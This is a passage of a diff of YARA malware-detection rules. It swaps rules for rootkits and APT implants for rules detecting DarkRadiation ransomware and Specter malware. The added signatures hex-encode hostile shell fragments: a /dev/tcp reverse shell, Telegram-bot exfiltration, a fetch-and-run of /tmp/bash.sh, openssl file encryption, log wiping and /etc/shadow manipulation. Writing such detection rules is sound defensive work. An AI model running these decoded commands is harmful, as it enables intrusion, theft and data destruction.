fc 00 79 2a e8 [2] ff ff 8b 00 89 c7 e8 ?? fa ff ff 48 89 c6 bf [2] 40 00 b8 00 00 00 00 e8 b0 fb ff ff } + $s7 = { 8b 45 fc 48 63 d0 8b 85 2c ff ff ff 48 8d 8d 20 df ff ff 48 89 ce 89 c7 e8 ?? f3 ff ff 89 45 fc 8b 45 fc 89 c6 bf [2] 40 00 b8 00 00 00 00 e8 f0 f6 ff ff 83 7d fc } + $s8 = { 55 48 89 e5 53 48 81 ec e8 00 00 00 48 89 b5 48 ff ff ff 48 89 95 50 ff ff ff 48 89 8d 58 ff ff ff 4c 89 85 60 ff ff ff 4c 89 8d 68 ff ff ff 84 c0 74 23 0f 29 85 70 ff ff ff 0f 29 4d 80 0f 29 55 90 0f 29 5d a0 0f 29 65 b0 0f 29 6d c0 0f 29 75 d0 0f 29 7d e0 48 89 bd 18 ff ff ff 48 8b 05 [2] 20 00 48 85 c0 75 16 be [2] 40 00 bf [2] 40 00 e8 ?? fd ff ff 48 89 05 [2] 20 00 c7 85 20 ff ff ff 08 00 00 00 c7 85 24 ff ff ff 30 00 00 00 48 8d 45 10 48 89 85 28 ff ff ff 48 8d 85 40 ff ff ff 48 89 85 30 ff ff ff 48 8b 05 [2] 20 00 48 8d 95 20 ff ff ff 48 8b 8d 18 ff ff ff 48 89 ce 48 89 c7 e8 ?? fd ff ff 48 c7 85 38 ff ff ff [2] 40 00 48 8b 1d [2] 20 00 48 8b 85 38 ff ff ff 48 89 c7 e8 ?? fb ff ff 48 89 c6 48 8b 85 38 ff ff ff 48 89 d9 ba 01 00 00 00 48 89 c7 e8 ?? fd ff ff 48 8b 05 [2] 20 00 48 89 c7 e8 ?? fc ff ff 48 81 c4 e8 00 00 00 5b } condition: - uint16(0)==0x5a4d and filesize >6KB and ( all of ($seq*) or 2 of ($s*)) + uint32(0)==0x464c457f and filesize >10KB and 6 of ($s*) } -rule ARKBIRD_SOLG_MAL_Netfilter_May_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_ELK_Darkradiation_Jul_2021_3 : FILE { meta: - description = "Detect Netfilter rootkit" + description = "Detect structures of scripts like used by the DarkRadiation ransomware" author = "Arkbird_SOLG" - id = "da333ed8-8cd3-5ae4-bce5-a43a227fdee3" - date = "2021-06-18" - modified = "2021-06-21" - reference = "https://twitter.com/struppigel/status/1405483373280235520" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-18/Netfilter/MAL_Netfilter_May_2021_1.yara#L1-L22" + id = "144eb08d-e222-5f6f-925d-33077953e7e6" + date = "2021-07-03" + modified = "2021-07-05" + reference = "https://bazaar.abuse.ch/browse/tag/DarkRadiation/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-04/DarkRadiation/RAN_ELK_DarkRadiation_Jul_2021_3.yara#L1-L29" license_url = "N/A" - logic_hash = "f219981af907f74e4d95f768d99b7fd877c8bfb00587d198a4b0e2c521c744e1" + logic_hash = "8d2fa53f5abd327d100ffc71863f3b49ce8a19f1a72db556902d95ae6ba09d4a" score = 75 - quality = 73 + quality = 55 tags = "FILE" - hash1 = "63d61549030fcf46ff1dc138122580b4364f0fe99e6b068bc6a3d6903656aff0" - hash2 = "8249e9c0ac0840a36d9a5b9ff3e217198a2f533159acd4bf3d9b0132cc079870" - hash3 = "d64f906376f21677d0585e93dae8b36248f94be7091b01fd1d4381916a326afe" + hash1 = "bc6e4b879228c248b7ff9aebbf857e94354829a98b6aea9b1c187005cbc2e0d0" + hash2 = "691afd4ef5f33d99053c57456ce9fa126e29d51d4dd510928193d8c3332547b1" + hash3 = "fdd8c27495fbaa855603df4f774fe86bbc21743f59fd039f734feb07704805bd" tlp = "White" - adversary = "Chinese APT Group" + adversary = "FERRUM" strings: - $seq1 = { 48 8b 05 a9 57 ff ff 45 33 c9 49 b8 32 a2 df 2d 99 2b 00 00 48 85 c0 74 05 49 3b c0 75 38 0f 31 48 c1 e2 20 48 8d 0d 85 57 ff ff 48 0b c2 48 33 c1 48 89 05 78 57 ff ff 66 44 89 0d 76 57 ff ff 48 8b 05 69 57 ff ff 48 85 c0 75 0a 49 8b c0 48 89 05 5a 57 ff ff 48 f7 d0 48 89 05 58 57 } - $seq2 = { 48 83 ec 38 48 83 64 24 20 00 48 8d 05 83 4c 00 00 48 8d 15 24 d1 00 00 48 89 44 24 28 48 8d 4c 24 20 e8 4d 05 00 00 85 c0 78 16 4c 8d 05 22 d1 00 00 83 ca ff 48 8d 0d 00 d1 00 00 e8 39 05 00 00 48 83 c4 } - $seq3 = { 45 33 c0 48 8d 4c 24 40 41 8d 50 01 ff 15 5d 62 00 00 c6 84 24 88 00 00 00 01 48 8d 84 24 88 00 00 00 48 89 46 18 48 8d 0d e2 fe ff ff 48 89 9e c0 00 00 00 48 8d 44 24 40 48 89 46 50 48 8d 44 24 30 48 89 46 48 65 48 8b 04 25 88 01 00 00 48 89 86 98 00 00 00 48 8b 86 b8 00 00 00 40 88 7e 40 c6 40 b8 06 4c 89 78 e0 48 89 58 e8 c7 40 c0 01 00 00 00 c7 40 c8 0d 00 00 00 48 89 58 d0 48 8b 86 b8 00 00 00 48 89 48 f0 48 8d 4c 24 40 48 89 48 f8 c6 40 bb e0 48 8b 43 28 48 85 c0 74 2f 48 8b 48 10 48 85 c9 74 07 48 21 78 10 4c 8b f1 48 8b 08 48 85 c9 74 06 48 21 38 48 8b e9 48 8b 48 08 48 85 c9 74 08 48 83 60 08 00 48 8b f9 48 8b d6 49 8b cf ff 15 74 61 00 00 3d 03 01 00 00 75 19 48 83 64 24 20 00 48 8d 4c 24 40 41 b1 01 45 33 c0 33 d2 ff 15 64 61 00 00 48 8b 43 28 48 85 c0 74 1a 4d } - $seq4 = { 8b 84 24 80 00 00 00 48 8d 54 24 38 48 8b 4c 24 30 44 8b ce 89 44 24 28 45 33 c0 48 89 7c 24 20 ff 15 66 2e 00 00 48 8b 4c 24 30 8b d8 ff 15 49 2e 00 00 48 8b 4c 24 30 ff 15 26 2d 00 00 8b } - $s1 = "%sc=%s" fullword ascii - $s2 = { 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 } - $s3 = "NETIO.SYS" fullword ascii + $s1 = { 66 6f 72 20 66 69 6c 65 20 69 6e 20 60 66 69 6e 64 20 2f 20 2d 6e 61 6d 65 20 27 2a 2e 73 68 27 20 2d 74 79 70 65 20 66 20 2d 65 78 65 63 20 67 72 65 70 20 2d 6c } + $s2 = { 72 6d 20 2d 72 66 20 2f 76 61 72 2f 6c 6f 67 2f 79 75 6d 2a } + $s3 = { 69 66 20 72 70 6d 20 2d 71 20 6f 70 65 6e 73 73 6c } + $s4 = { 6f 70 65 6e 73 73 6c 20 65 6e 63 20 2d 61 65 73 2d 32 35 36 2d 63 62 63 20 2d 73 61 6c 74 20 2d 70 61 73 73 20 70 61 73 73 3a 24 50 41 53 53 20 2d 69 6e 20 24 66 69 6c 65 20 2d 6f 75 74 20 24 66 69 6c 65 2e e2 98 a2 } + $x1 = { 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 62 6f 74 27 24 54 4f 4b 45 4e } + $x2 = { 4d 53 47 5f 55 52 4c 3d 24 55 52 4c 27 2f 73 65 6e 64 4d 65 73 73 61 67 65 3f 63 68 61 74 5f 69 64 3d 27 } + $x3 = { 55 50 44 5f 55 52 4c 3d 24 55 52 4c 27 2f 67 65 74 55 70 64 61 74 65 73 3f 6f 66 66 73 65 74 3d 27 } + $x4 = { 62 61 73 68 20 2d 69 20 3e 26 20 2f 64 65 76 2f 74 63 70 2f 24 49 50 2f 24 50 4f 52 54 20 30 3e 26 31 } + $x5 = { 6d 73 67 3d 22 5b 2b 5d 20 53 68 65 6c 6c 20 52 75 6e 6e 69 6e 67 2e 22 } + $x6 = { 72 65 73 3d 24 28 63 75 72 6c 20 2d 73 20 2d 58 20 50 4f 53 54 20 24 4d 53 47 5f 55 52 4c 20 2d 64 20 63 68 61 74 5f 69 64 3d 24 49 44 5f 4d 53 47 20 2d 64 20 74 65 78 74 3d 22 44 4f 4e 45 21 21 21 22 20 26 29 } + $y1 = { 23 21 2f 62 69 6e 2f 62 61 73 68 } + $y2 = { 3b [2-5] 3d 27 [2-5] 27 3b [2-5] 3d 27 [2-5] 27 3b [2-5] 3d 27 [2-5] 27 3b [2-5] 3d 27 [2-5] 27 3b } + $y3 = { 65 76 61 6c 20 22 24 [2-5] 24 [2-5] 24 [2-5] 24 } condition: - uint16(0)==0x5a4d and filesize >20KB and (3 of ($seq*) or 2 of ($s*)) + filesize >1KB and (3 of ($s*) or 5 of ($x*) or all of ($y*)) } -rule ARKBIRD_SOLG_APT_Molerats_Feb_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_ELK_Darkradiation_Jul_2021_2 : FILE { meta: - description = "Detect Molerats implants" + description = "Detect the DarkRadiation ransomware" author = "Arkbird_SOLG" - id = "8ede3aa9-9788-52a5-91a7-bb160daad5ba" - date = "2021-02-27" - modified = "2021-03-01" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-28/Molerats/APT_Molerats_Feb_2021_1.yar#L1-L23" + id = "3580a41a-ba2e-5a47-b35d-b2482fbc913a" + date = "2021-07-03" + modified = "2021-07-05" + reference = "https://bazaar.abuse.ch/browse/tag/DarkRadiation/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-04/DarkRadiation/RAN_ELK_DarkRadiation_Jul_2021_2.yara#L1-L27" license_url = "N/A" - logic_hash = "fbd98f088019434f736107dfe62a307e2c57d0288d68f3133a13de59bf318aea" + logic_hash = "b21db1658845cafe37950d69b5bc0aab203e7bea3e43f95394236e0133234e2d" score = 75 - quality = 75 + quality = 57 tags = "FILE" - hash1 = "0a55551ade55705d4be6e946ab58a26d7cf8087558894af8799931b09d38f3bc" - hash2 = "c9d7b5d06cd8ab1a01bf0c5bf41ef2a388e41b4c66b1728494f86ed255a95d48" + hash1 = "3bab2947305c00df66cb4d6aaef006f10aca348c17aa2fd28e53363a08b7ec68" + hash2 = "652ee7b470c393c1de1dfdcd8cb834ff0dd23c93646739f1f475f71a6c138edd" + hash3 = "79aee7a4459d49dc6dfebf1a45d32ccc3769a1e5c1f231777ced3769607ba9c1" + tlp = "White" + adversary = "FERRUM" strings: - $seq1 = { 55 8b ec 81 c4 60 fc ff ff 53 33 d2 89 95 60 fc ff ff 89 45 fc 33 c0 55 68 [1-3] 00 64 ff 30 64 89 20 8b 45 fc 83 78 44 00 0f 85 5d 01 00 00 b2 01 a1 [2] 44 00 e8 [3] ff 8b 55 fc 89 42 44 8b 45 fc 83 c0 48 e8 [3] ff 8d 85 ec fe ff ff 50 6a 40 e8 [3] ff 48 85 c0 0f 8c 18 01 00 00 40 89 45 f0 8d 85 ec fe ff ff 89 45 ec 8b 45 ec 8b 00 e8 35 ?? f5 ff 84 c0 0f 84 ec 00 00 00 8d 45 f4 50 68 19 00 02 00 6a 00 6a 00 8b 45 ec 0f b7 00 89 85 64 fc ff ff c6 85 68 fc ff ff 00 8d 8d 64 fc ff ff ba [3] 00 8d 85 6c fc ff ff e8 [3] ff 50 68 02 00 00 80 e8 [3] ff 85 c0 0f 85 a3 00 00 00 33 c0 55 68 [3] 00 64 ff 30 64 89 20 c7 45 f8 00 02 00 00 8d 45 f8 50 8d 85 ec fc ff ff 50 6a 00 6a 00 68 [3] 00 8b 45 f4 50 e8 [3] ff 85 c0 75 4f 8d 85 60 fc ff ff 8d 95 ec fc ff ff b9 00 01 00 00 e8 [3] ff 8b 95 60 fc ff ff 8b 45 ec 8b 08 8b 45 fc 8b 40 44 8b 18 ff 53 40 8b 45 ec 8b 00 8b 55 fc 3b 42 4c 75 16 8b 45 fc 83 c0 48 8d 95 ec fc ff ff b9 00 01 00 00 e8 [3] ff 33 c0 5a 59 59 64 89 10 68 [3] 00 8b 45 f4 50 e8 [3] ff } - $seq2 = { 55 8b ec 81 c4 e4 fd ff ff 53 8b da 89 45 fc 8b 45 fc e8 [2] ff ff 33 c0 55 68 [2] 40 00 64 ff 30 64 89 20 83 7d fc 00 75 15 68 05 01 00 00 8d 85 e6 fd ff ff 50 6a 00 e8 [2] ff ff eb 1a 8b 45 fc e8 [2] ff ff 8b c8 8d 85 e6 fd ff ff ba 05 01 00 00 e8 da f7 ff ff 66 83 bd e6 fd ff ff 00 0f 84 a7 01 00 00 33 c0 89 45 f8 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 01 00 00 80 e8 [2] ff ff 85 c0 0f 84 9a 00 00 00 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 02 00 00 80 e8 2b 5e ff ff 85 c0 74 7c 8d 45 f4 50 68 19 00 0f 00 6a 00 68 70 f6 40 00 68 01 00 00 80 e8 0d 5e ff ff 85 c0 74 5e 8d 45 f4 50 68 19 00 0f 00 6a 00 68 70 f6 40 00 68 02 00 00 80 e8 [2] ff ff 85 c0 74 40 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 01 00 00 80 e8 [2] ff ff 85 c0 74 22 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 01 00 00 80 e8 [2] ff ff 85 c0 0f 85 e6 00 00 00 33 c0 55 68 [2] 40 00 64 ff 30 64 89 20 8d 85 e6 fd ff ff ba 05 01 00 00 e8 c9 fc ff ff 8d 45 f0 50 6a 00 6a 00 6a 00 8d 85 e6 fd ff ff 50 8b 45 f4 50 e8 [2] ff ff 85 c0 75 33 8b 45 f0 e8 [2] ff ff 89 45 f8 8d 45 f0 50 8b 45 f8 50 6a 00 6a 00 8d 85 e6 fd ff ff 50 8b 45 f4 50 e8 [2] ff ff 8b c3 8b 55 f8 e8 [2] ff ff eb 4b 8d 45 f0 50 6a 00 6a 00 6a 00 68 [2] 40 00 8b 45 f4 50 e8 [2] ff ff 85 c0 75 2f 8b 45 f0 e8 [2] ff ff 89 45 f8 8d 45 f0 50 8b 45 f8 50 6a 00 6a 00 68 [2] 40 00 8b 45 f4 50 e8 [2] ff ff 8b c3 8b 55 f8 e8 [2] ff ff 33 c0 5a 59 59 64 89 10 68 [2] 40 00 83 7d f8 00 74 08 8b 45 f8 e8 [2] ff ff 8b 45 f4 50 e8 [2] ff ff } - $seq3 = { d1 f8 79 03 83 d0 00 03 45 80 89 45 d0 8b 45 a4 8b 80 e4 02 00 00 8b 40 10 01 45 d0 8b 45 a4 8b 80 e4 02 00 00 8b 40 04 29 45 d0 8b 75 8c 2b 75 d4 83 ee 02 8b 45 a4 8b 80 e4 02 00 00 2b 70 08 8b 45 a4 8b 80 e4 02 00 00 2b 70 0c 89 75 8c 6a 00 56 8b 45 d0 50 8b 45 ec e8 [2] fb ff 50 57 8b 85 68 ff ff ff 50 e8 [2] fc ff 84 db 0f 84 0d 03 00 00 a1 [3] 00 8b 00 e8 [2] 09 00 50 8b 45 b4 50 6a 23 e8 [3] ff 89 45 d8 8b 45 d8 01 45 90 83 45 94 0f 83 45 90 05 8b 45 f0 8b 40 08 8b 50 74 } - $s1 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x" fullword wide - $s2 = { 45 00 72 00 72 00 6f 00 72 00 20 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 73 00 65 00 72 00 76 00 65 00 72 00 3a 00 20 00 25 00 73 } - $s3 = { 45 00 72 00 72 00 6f 00 72 00 20 00 6f 00 70 00 65 00 6e 00 69 00 6e 00 67 00 20 00 72 00 65 00 71 00 75 00 65 00 73 00 74 00 3a 00 20 00 28 00 25 00 64 00 29 00 20 00 25 00 73 } - $s4 = { 43 00 61 00 6e 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 65 00 6e 00 20 00 66 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 00 2e 00 20 00 25 00 73 } - $s5 = { 43 00 61 00 6e 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 65 00 6e 00 20 00 63 00 6c 00 69 00 70 00 62 00 6f 00 61 00 72 00 64 00 3a 00 20 00 25 00 73 } + $s1 = { 61 6c 6c 54 68 72 65 61 64 73 3d 28 24 31 29 } + $s2 = { 4d 53 47 5f 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 62 6f 74 27 24 54 4f 4b 45 4e 27 2f 73 65 6e 64 4d 65 73 73 61 67 65 3f 63 68 61 74 5f 69 64 3d 27 } + $s3 = { 69 66 20 5b 5b 20 22 24 6d 61 73 74 65 72 22 20 21 3d 20 22 24 73 6c 61 76 65 22 20 5d 5d } + $s4 = { 75 73 65 72 5f 68 6f 73 74 3d 24 28 65 63 68 6f 20 22 24 7b 70 61 72 73 65 5f 61 72 67 7d 22 20 7c 20 61 77 6b 20 2d 46 20 22 7c 22 20 27 7b 70 72 69 6e 74 20 24 31 7d 27 29 } + $s5 = { 6d 61 73 74 65 72 3d 24 28 63 61 74 20 2f 74 6d 70 2f 2e 63 63 77 20 7c 20 77 63 20 2d 6c 29 } + $s6 = { 73 65 6e 64 5f 6d 65 73 73 61 67 65 20 24 69 64 20 22 24 28 68 6f 73 74 6e 61 6d 65 29 20 24 28 68 6f 73 74 6e 61 6d 65 20 2d 49 29 } + $s7 = { 73 74 61 72 74 5f 74 68 72 65 61 64 20 24 61 6c 6c 54 68 72 65 61 64 73 } + $s8 = { 69 70 5f 68 6f 73 74 3d 24 28 65 63 68 6f 20 22 24 7b 70 61 72 73 65 5f 61 72 67 7d 22 20 7c 20 61 77 6b 20 2d 46 20 22 7c 22 20 27 7b 70 72 69 6e 74 20 24 32 7d 27 29 } + $s9 = { 70 6f 72 74 5f 68 6f 73 74 3d 24 28 65 63 68 6f 20 22 24 7b 70 61 72 73 65 5f 61 72 67 7d 22 20 7c 20 61 77 6b 20 2d 46 20 22 7c 22 20 27 7b 70 72 69 6e 74 20 24 33 7d 27 29 } + $s10 = { 24 28 63 75 72 6c 20 2d 73 20 2d 2d 69 6e 73 65 63 75 72 65 20 2d 2d 64 61 74 61 2d 75 72 6c 65 6e 63 6f 64 65 20 22 74 65 78 74 3d [2-15] 22 20 22 24 4d 53 47 5f 55 52 4c [2-15] 22 20 26 29 } + $s11 = { 73 6c 61 76 65 3d 24 28 65 63 68 6f 20 22 24 7b [2-15] 7d 22 20 7c 20 77 63 20 2d 6c 29 } condition: - uint16(0)==0x5a4d and filesize >500KB and 2 of ($seq*) and 3 of ($s*) + filesize >1KB and 6 of ($s*) } -rule ARKBIRD_SOLG_APT_APT34_Dustman_Apr_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_ELK_Darkradiation_Jul_2021_1 : FILE { meta: - description = "Detect the Installer of Dustman wiper used by APT34" + description = "Detect the DarkRadiation ransomware" author = "Arkbird_SOLG" - id = "071063f5-d2a4-5666-a8c4-283c02061f6d" - date = "2021-04-28" - modified = "2021-04-30" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-29/APT34/APT_APT34_Dustman_Apr_2021_1.yara#L1-L19" + id = "13d77ecc-14ab-54ce-9eec-2d614f5ae8e4" + date = "2021-07-03" + modified = "2021-07-05" + reference = "https://bazaar.abuse.ch/browse/tag/DarkRadiation/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-04/DarkRadiation/RAN_ELK_DarkRadiation_Jul_2021_1.yara#L1-L25" license_url = "N/A" - logic_hash = "44e68fa21c1d6258bc9c0dcdc9cc531a15081122c90b23607bcfda716471aeb6" + logic_hash = "6fbc6eed7dd7f92af0cd8b3b2726636a64dc8de0b795b176169817994f44d4fa" score = 75 - quality = 75 + quality = 61 tags = "FILE" - hash1 = "a9397eb9e95087db7e03239c689776d56c1450d685568564acd90e1532c78882" - tlp = "white" - adversary = "APT34" + hash1 = "1c2b09417c1a34bbbcb8366c2c184cf31353acda0180c92f99828554abf65823" + hash2 = "d0d3743384e400568587d1bd4b768f7555cc13ad163f5b0c3ed66fdc2d29b810" + hash3 = "e380c4b48cec730db1e32cc6a5bea752549bf0b1fb5e7d4a20776ef4f39a8842" + tlp = "White" + adversary = "FERRUM" strings: - $s1 = { 43 3a 5c 77 69 6e 64 6f 77 73 5c 73 79 73 74 65 6d 33 32 5c 63 6d 64 2e 65 78 65 00 00 00 00 00 2f 63 20 61 67 65 6e 74 2e 65 78 65 20 41 00 00 44 00 6f 00 77 00 6e 00 20 00 57 00 69 00 74 00 68 00 20 00 42 00 69 00 6e 00 20 00 53 00 61 00 6c 00 6d 00 61 00 6e 00 00 00 00 00 5c 00 } - $s2 = "\\assistant.sys" fullword wide - $s3 = { 61 00 67 00 65 00 6e 00 74 00 2e 00 65 00 78 00 65 00 00 00 00 00 00 00 53 00 6f 00 66 00 74 00 77 00 61 00 72 00 65 00 5c 00 4f 00 72 00 61 00 63 00 6c 00 65 00 5c 00 56 00 69 00 72 00 74 00 75 00 61 00 6c 00 42 00 6f 00 78 00 00 00 00 00 54 68 65 20 4d 61 67 69 63 20 57 6f 72 64 21 00 56 00 42 00 6f 00 78 00 44 00 72 00 76 00 00 00 5c 00 44 00 65 00 76 00 69 00 63 00 65 00 00 00 56 00 42 00 6f 00 78 00 55 00 53 00 42 00 4d 00 6f 00 6e 00 00 00 00 00 56 00 42 00 6f 00 78 00 4e 00 65 00 74 00 41 00 64 00 70 00 00 00 00 00 56 00 42 00 6f 00 78 00 4e 00 65 00 74 00 4c 00 77 00 66 } - $s4 = { 5c 00 5c 00 2e 00 5c 00 25 00 73 } - $s5 = { 68 54 00 00 00 68 00 00 00 00 68 80 69 40 00 e8 f4 0f 00 00 83 c4 0c 68 00 00 00 00 e8 ed 0f 00 00 a3 84 69 40 00 68 00 00 00 00 68 00 10 00 00 68 00 00 00 00 e8 da 0f 00 00 a3 80 69 40 00 e8 fc 2f 00 00 e8 7d 2c 00 00 e8 7a 18 00 00 e8 1d 12 00 00 e8 40 2d 00 00 68 00 00 00 00 e8 78 2f 00 00 a3 8c 69 40 00 68 00 00 00 00 e8 8d 2f 00 00 a3 90 69 40 00 c7 05 94 69 40 00 5a 00 00 00 c7 05 98 69 40 00 14 00 00 00 8b 1d 8c 69 40 00 2b 1d 94 69 40 00 83 c3 ea 89 1d 9c 69 40 00 8b 1d 90 69 40 00 2b 1d 98 69 40 00 83 c3 cc 89 1d a0 69 40 00 68 00 00 c8 00 68 18 60 40 00 ff 35 98 69 40 00 ff 35 94 69 40 00 ff 35 a0 69 40 00 ff 35 9c 69 40 00 68 00 00 00 } - $s6 = "Release\\Dustman.pdb" fullword ascii + $s1 = { 50 41 53 53 5f 44 45 43 3d 24 28 6f 70 65 6e 73 73 6c 20 65 6e 63 20 2d 62 61 73 65 36 34 20 2d 61 65 73 2d 32 35 36 2d 63 62 63 20 2d 64 20 2d 70 61 73 73 20 70 61 73 73 3a 24 50 41 53 53 5f 44 45 20 3c 3c 3c 20 24 31 29 } + $s2 = { 72 6d 20 2d 72 66 20 24 50 41 54 48 5f 54 45 4d 50 5f 46 49 4c 45 2f 24 4e 41 4d 45 5f 53 43 52 49 50 54 5f 43 52 59 50 54 } + $s3 = { 74 65 6c 65 67 72 61 6d 5f 62 6f 74 2f [5-15] 2d 6f 20 22 2f } + $s4 = { 2d 6f 20 22 2f 74 6d 70 2f 62 61 73 68 2e 73 68 22 3b 63 64 20 2f 74 6d 70 3b 63 68 6d 6f 64 20 2b 78 20 62 61 73 68 2e 73 68 3b 2e 2f 62 61 73 68 2e 73 68 3b } + $s5 = { 78 61 72 67 73 20 2d 50 20 31 30 20 2d 49 20 46 49 4c 45 20 6f 70 65 6e 73 73 6c 20 65 6e 63 20 2d 61 65 73 2d 32 35 36 2d 63 62 63 20 2d 73 61 6c 74 20 2d 70 61 73 73 20 70 61 73 73 } + $s6 = { 78 61 72 67 73 20 2d 50 20 31 30 20 2d 49 20 46 49 4c 45 20 6f 70 65 6e 73 73 6c 20 65 6e 63 20 2d 61 65 73 2d 32 35 36 2d 63 62 63 20 2d 73 61 6c 74 20 2d 70 61 73 73 20 70 61 73 73 3a 24 50 41 53 53 5f 44 45 43 20 2d 69 6e 20 46 49 4c 45 20 2d 6f 75 74 20 46 49 4c 45 2e } + $s7 = { 75 73 65 72 6d 6f 64 20 2d 2d 73 68 65 6c 6c 20 2f 62 69 6e 2f 6e 6f 6c 6f 67 69 6e } + $s8 = { 67 72 65 70 20 2d 46 20 22 24 22 20 2f 65 74 63 2f 73 68 61 64 6f 77 20 7c 20 63 75 74 20 2d 64 3a 20 2d 66 31 20 7c 20 67 72 65 70 20 2d 76 20 22 [1-15] 22 20 7c 20 78 61 72 67 73 20 2d 49 20 46 49 4c 45 20 67 70 61 73 73 77 64 20 2d 64 20 46 49 4c 45 20 77 68 65 65 6c } + $s9 = { 73 79 73 74 65 6d 63 74 6c 20 73 74 6f 70 20 64 6f 63 6b 65 72 20 26 26 20 73 79 73 74 65 6d 63 74 6c 20 64 69 73 61 62 6c 65 20 64 6f 63 6b 65 72 } condition: - uint16(0)==0x5a4d and filesize >50KB and 4 of them + filesize >5KB and 5 of ($s*) } -rule ARKBIRD_SOLG_RAN_ELF_Revil_Jun_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_ELF_Specter_Jul_2021_1 : FILE { meta: - description = "Detect the ELF version of REvil ransomware" + description = "Detect the Specter malware" author = "Arkbird_SOLG" - id = "b4b9d60e-a352-5045-8be3-e9a08d70ef6b" - date = "2021-06-28" - modified = "2021-06-29" - reference = "https://twitter.com/jaimeblascob/status/1409603887871500288" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-28/REvil/RAN_ELF_REvil_Jun_2021_1.yara#L1-L22" + id = "24237a56-2717-5efc-9bfb-9ab6d87e082b" + date = "2021-07-02" + modified = "2021-07-05" + reference = "https://twitter.com/JAMESWT_MHT/status/1410870749473148930" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-04/Specter/MAL_ELF_Specter_Jul_2021_1.yara#L1-L20" license_url = "N/A" - logic_hash = "054bdb8362fdea2dc914b11387f6c67e35932acb73ba2b133ca29f69549914ba" + logic_hash = "de737f051d34edb2219e77c0d4f0239b95bad9983ee5e435d6ee9741525816f0" score = 75 quality = 75 tags = "FILE" - hash1 = "3d375d0ead2b63168de86ca2649360d9dcff75b3e0ffa2cf1e50816ec92b3b7d" - hash2 = "d6762eff16452434ac1acc127f082906cc1ae5b0ff026d0d4fe725711db47763" - hash3 = "796800face046765bd79f267c56a6c93ee2800b76d7f38ad96e5acb92599fcd4" - hash4 = "ea1872b2835128e3cb49a0bc27e4727ca33c4e6eba1e80422db19b505f965bc4" + hash1 = "0bff46518b35ddfe37f4a7820286aab829d81f1480d9eeca5aaedc9ceda6724f" + hash2 = "be97d7ae3b2d876f027d99d8d61dbca92513f4975336c2ebc26cf8a0839b67b6" tlp = "White" - adversary = "RAAS" + adversary = "Specter" strings: - $seq1 = { 55 48 89 e5 48 83 c4 80 bf 04 20 00 00 e8 69 d5 ff ff 48 89 45 f8 ?? 8b 05 [2] 31 00 [0-4] 48 8b 3d [2] 31 00 48 8b 35 [2] 31 00 48 8b 0d [2] 31 00 4c 8b 0d [2] 31 00 4c 8b [2] 13 31 00 48 8b 15 ?? 13 31 00 48 8b 45 f8 4c 89 ?? 24 18 48 89 7c 24 10 48 89 74 24 08 48 89 0c 24 ?? 89 } - $seq2 = { 48 89 e5 bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff 8b 05 [2] 20 00 89 c6 bf [2] 41 00 b8 00 00 00 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff } - $seq3 = { 48 83 ec 20 c7 45 fc 00 00 00 00 eb 64 8b 45 fc 48 8b 14 c5 48 92 61 00 48 8b 05 ?? bd 20 00 48 89 c6 bf 40 93 61 00 b8 00 00 00 00 e8 ?? 3f ff ff 8b 45 fc 48 8b 04 c5 48 92 61 00 48 89 c6 bf [2] 41 00 b8 00 00 00 00 e8 ?? 3d ff ff be [2] 41 00 bf 40 93 61 00 e8 ?? 3e ff ff 48 89 45 f0 48 